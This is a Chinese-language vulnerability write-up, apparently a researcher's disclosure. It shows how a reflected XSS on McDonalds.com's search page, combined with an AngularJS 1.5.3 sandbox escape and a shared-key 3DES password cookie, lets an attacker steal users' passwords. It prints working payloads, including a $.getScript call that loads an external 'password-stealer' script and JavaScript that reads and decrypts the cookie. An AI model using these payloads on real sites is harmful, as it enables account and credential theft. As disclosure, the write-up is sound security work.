本文讲述了利用不安全的加密存储(Insecure_Cryptographic_Storage)漏洞和服务端反射型XSS漏洞,实现对麦当劳网站( McDonalds.com) 注册用户的密码窃取,进一步测试,还可能获取到网站注册用户的更多信息。
POC-利用反射型XSS漏洞绕过AngularJS框架沙箱麦当劳网站McDonalds.com设置有一个搜索页面,该页面存在XSS反射型漏洞,可以返回搜索参数值,假设搜索参数q为***********-test-reflected-test-***********,对应链接:
https://www.mcdonalds.com/us/en-us/search-results.html?q= ***********-test-reflected-test-***********
则执行效果如下:
麦当劳网站采用AngularJS框架,所以可以使用特殊字符在搜索区域进行返回值尝试。通过更改搜索参数q为{{$id}}之后,发现返回值对应AngularJS范围内的对应ID数字9:
Link used: https://www.mcdonalds.com/us/en-us/search-results.html?q= {{$id}}
AngularJS是一个流行的javascript框架,通过这个框架可以把表达式放在花括号中嵌入到页面中。例如,表达式1+2={{1+2}}将会得到1+2=3。其中括号中的表达式被执行了,这就意味着,如果服务端允许用户输入的参数中带有花括号,我们就可以用Angular表达式来进行xss攻击。
由于AngularJS工作在沙箱模式,所以使用参数{{alert(1)}}无任何返回信息,但这并不代表AngularJS沙箱没有漏洞。在 AngularJS1.6版本 中,由于沙箱机制不能很好地起到安全防护目的,已经被从源码中移除。而PortSwigger还对AngularJS的各版本沙箱 进行了绕过测试 ,并给出了相应绕过执行命令。
在这里,我们来看看McDonalds.com使用的AngularJS版本,通过在浏览器控制端输入angular.version命令:
可以发现AngularJS为1.5.3版本,参照PortSwigger的测试,我们选用
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}作为搜索参数,很惊喜,返回值如下:
这就意味着,我们可以利用绕过命令,对网站加载外部JS脚本文件,如构造如下命令:
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`返回结果如下:
在内容安全策略(Content-Security-Policy)的提示下,第三方脚本文件被成功加载。
窃取密码除此之外,我在麦当劳网站的注册页面发现了复选框“Remember my password”,通常来说,这只有在用户登录页面才存在,有点奇怪:
在该页面的源代码页面,包含了各种passowrd字段内容,甚至存在一个有趣的密码解密函数:
最危险的是,利用该解密函数代码竟然可以实现对客户端或双向加密存储的密码破解。尝试对发现的被存储Cookie值penc进行解密,竟然成功了!
而且,经分析发现,Cookie值penc的存储期限是大大的一年!LOL!
另外,以下的源码分析显示,麦当劳网站使用了Javascript的CryptoJS加密库进行信息加密,加密方式为3DES,其中加密参数key和iv都为通用,这意味着只需要获取到cookie值就能对密码解密:
由于AngularJS沙箱绕过方法只对charAt的join方法(charAt=[].join;$eval(‘x=alert(1)’))有效,所以即使我曾尝试在搜索区域构造其它恶意命令对cookie信息进行解密,但最终总是因为getCookie失败而无效。只有当charAt(0) 不为空时,getCookie才有返回值:
最后,我写了一段调用麦当劳网站首页框架进行cookie窃取的脚本,为了避免脚本因AngularJS沙箱被绕过而被反复执行,所以,我用window.xssIsExecuted对其进行了显示控制,如下:
if (!window.xssIsExecuted) { window.xssIsExecuted = true; var iframe = $('<iframe src="https://www.mcdonalds.com/us/en-us.html"></iframe>'); $('body').append(iframe); iframe.on('load', function() { var penc = iframe[0].contentWindow.getCookie('penc'); alert(iframe[0].contentWindow.decrypt(penc)); }); }最终,配合以下AngularJS沙箱绕过命令,可以成功从cookie信息中对密码解密!
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}